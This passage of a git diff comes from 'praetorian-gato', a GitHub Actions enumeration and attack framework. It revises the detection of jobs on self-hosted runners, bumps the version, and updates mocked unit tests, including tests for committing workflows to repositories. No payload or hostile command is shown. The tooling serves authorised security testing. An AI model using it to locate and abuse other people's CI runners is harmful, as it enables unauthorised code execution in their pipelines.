+                    # We need to check each OS in the matrix strategy.
+                    # Extract the matrix key from the variable
+                    matrix_match = re.search(self.MATRIX_KEY_EXTRACTION_REGEX, runs_on)
+
+                    if matrix_match:
+                        matrix_key = matrix_match.group(1)
+                    else:
+                        continue
+                    # Check if strategy exists in the yaml file
+                    if 'strategy' in job_details and 'matrix' in job_details['strategy']:
+                        matrix = job_details['strategy']['matrix']
+
+                        # Use previously acquired key to retrieve list of OSes
+                        if matrix_key in matrix:
+                            os_list = matrix[matrix_key]
+                        elif 'include' in matrix:
+                            inclusions = matrix['include']
+                            os_list = []
+                            for inclusion in inclusions:
+                                if matrix_key in inclusion:
+                                    os_list.append(inclusion[matrix_key])
+                        else:
+                            continue
+
+                        # We only need ONE to be self hosted, others can be
+                        # GitHub hosted
+                        for key in os_list:
+                            if type(key) == str:
+                                if key not in self.GITHUB_HOSTED_LABELS and not re.match(self.LARGER_RUNNER_REGEX_LIST, key):
+                                    sh_jobs.append((jobname, job_details))
+                                    break
+                    pass
+                else:
+                    if type(runs_on) == list:
+                        for label in runs_on:
+                            if label in self.GITHUB_HOSTED_LABELS:
+                                break
+                            if re.match(self.LARGER_RUNNER_REGEX_LIST, label):
+                                break
+                        else:
+                            sh_jobs.append((jobname, job_details))
+                    elif type(runs_on) == str:
+                        if runs_on in self.GITHUB_HOSTED_LABELS:
+                            break
+                        if re.match(self.LARGER_RUNNER_REGEX_LIST, runs_on):
+                            break
+                        sh_jobs.append((jobname, job_details))
 
         return sh_jobs
 
diff --git a/pyproject.toml b/pyproject.toml
index 0378c85..7b29f9c 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "praetorian-gato"
-version = "1.5.1"
+version = "1.6.0"
 description = "GitHub Actions Enumeration and Attack Framework"
 readme = "readme.md"
 authors = [
diff --git a/test/test_cases.json b/test/test_cases.json
index 57d1820..7c5b5bb 100644
--- a/test/test_cases.json
+++ b/test/test_cases.json
@@ -119,7 +119,7 @@
                 "type": "stdout"
             },
             {
-                "expect": "[+] The repository contains a workflow: main.yml that executes on self-hosted runners!",
+                "expect": "[+] The repository contains a workflow: main.yml that might execute on self-hosted runners!",
                 "type": "stdout"
             }
         ],
diff --git a/unit_test/test_api.py b/unit_test/test_api.py
index 4589a37..8899700 100644
--- a/unit_test/test_api.py
+++ b/unit_test/test_api.py
@@ -456,7 +456,7 @@ def test_retrieve_run_logs(mock_get):
 
     mock_get.return_value.json.return_value = {
         "workflow_runs": [
-            {"id": 123, "run_attempt": 1}
+            {"id": 123, "run_attempt": 1, "conclusion": "success", "head_branch": "dev", "path": ".github/workflows/build.yml@dev"}
         ]
     }
 
@@ -469,14 +469,14 @@ def test_retrieve_run_logs(mock_get):
     logs = abstraction_layer.retrieve_run_logs("testOrg/testRepo")
 
     assert len(logs) == 1
-    assert logs[0]['runner_name'] == 'ghrunner-test'
+    assert list(logs)[0]['runner_name'] == 'ghrunner-test'
 
     logs = abstraction_layer.retrieve_run_logs(
         "testOrg/testRepo", short_circuit=False
     )
 
     assert len(logs) == 1
-    assert logs[0]['runner_name'] == 'ghrunner-test'
+    assert list(logs)[0]['runner_name'] == 'ghrunner-test'
 
 
 @patch("gato.github.api.requests.get")
@@ -670,7 +670,10 @@ def test_create_branch(mock_get, mock_post):
     test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
     mock_get.return_value.status_code = 200
 
-    mock_get.return_value.json.return_value = [
+    mock_get.return_value.json.side_effect = [
+        {
+            "default_branch": "dev"
+        },
         {
             "ref": "refs/heads/dev",
             "node_id": "REF_AAAAAAAAAAAAAAAAAAAAAAAAAAA",
@@ -698,7 +701,10 @@ def test_create_branch_fail(mock_get, mock_post):
     test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
     mock_get.return_value.status_code = 200
 
-    mock_get.return_value.json.return_value = [
+    mock_get.return_value.json.side_effect = [
+        {
+            "default_branch": "dev"
+        },
         {
             "ref": "refs/heads/dev",
             "node_id": "REF_AAAAAAAAAAAAAAAAAAAAAAAAAAA",
@@ -920,3 +926,85 @@ def test_handle_ratelimit(mock_time):
     api._Api__check_rate_limit(test_headers)
 
     mock_time.sleep.assert_called_once()
+
+
+@patch('gato.github.api.requests.get')
+@patch('gato.github.api.requests.post')
+def test_commit_workflow(mock_call_post, mock_call_get):
+    # Arrange
+    test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+    api = Api(test_pat, "2022-11-28")
+    mock_call_get.side_effect = [
+        MagicMock(status_code=200, json=MagicMock(return_value={'default_branch': 'main'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '123'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'tree': {'sha': '456'}})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '789', 'tree': []}))
+    ]
+    mock_call_post.side_effect = [
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'abc'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'def'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'ghi'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'jkl'}))
+    ]
+
+    # Act
+    result = api.commit_workflow('test_repo', 'test_branch', b'test_content', 'test_file')
+
+    # Assert
+    assert result == 'ghi'
+    assert mock_call_get.call_count == 4
+    assert mock_call_post.call_count == 4
+
+
+@patch('gato.github.api.requests.get')
+@patch('gato.github.api.requests.post')
+def test_commit_workflow_failure(mock_call_post, mock_call_get):
+    # Arrange
+    test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+    api = Api(test_pat, "2022-11-28")
+    mock_call_get.side_effect = [
+        MagicMock(status_code=200, json=MagicMock(return_value={'default_branch': 'main'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '123'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'tree': {'sha': '456'}})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '789', 'tree': []}))
+    ]
+    mock_call_post.side_effect = [
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'abc'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'def'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'ghi'})),
+        MagicMock(status_code=400, json=MagicMock(return_value={'sha': 'jkl'}))
+    ]
+
+    # Act
+    result = api.commit_workflow('test_repo', 'test_branch', b'test_content', 'test_file')
+
+    # Assert
+    assert result is None
+    assert mock_call_get.call_count == 4
+    assert mock_call_post.call_count == 4
+
+
+@patch('gato.github.api.requests.get')
+@patch('gato.github.api.requests.post')
+def test_commit_workflow_failure2(mock_call_post, mock_call_get):
+    # Arrange
+    test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+    api = Api(test_pat, "2022-11-28")
+    mock_call_get.side_effect = [
+        MagicMock(status_code=200, json=MagicMock(return_value={'default_branch': 'main'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '123'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'tree': {'sha': '456'}})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '789', 'tree': []}))
+    ]
+    mock_call_post.side_effect = [
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'abc'})),
+        MagicMock(status_code=404, json=MagicMock(return_value=None)),
+    ]
+
+    # Act
+    result = api.commit_workflow('test_repo', 'test_branch', b'test_content', 'test_file')
+
+    # Assert
+    assert result is None
+    assert mock_call_get.call_count == 4
+    assert mock_call_post.call_count == 2
diff --git a/unit_test/test_enumerate.py b/unit_test/test_enumerate.py
index d5601fb..22d346a 100644
--- a/unit_test/test_enumerate.py
+++ b/unit_test/test_enumerate.py
@@ -103,7 +103,7 @@ def test_enumerate_repo_admin(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -143,7 +143,7 @@ def test_enumerate_repo_admin_no_wf(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -183,7 +183,7 @@ def test_enumerate_repo_no_wf_no_admin(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -222,7 +222,7 @@ def test_enumerate_repo_no_wf_maintain(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -262,7 +262,7 @@ def test_enumerate_repo_only(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
diff --git a/unit_test/test_repo_enumerate.py b/unit_test/test_repo_enumerate.py
index 3f049d4..3b2d23c 100644
--- a/unit_test/test_repo_enumerate.py
+++ b/unit_test/test_repo_enumerate.py
@@ -45,7 +45,7 @@ def test_enumerate_repo():
     }
 
     mock_api.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -75,7 +75,7 @@ def test_enumerate_repo_admin():
     }
 
     mock_api.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))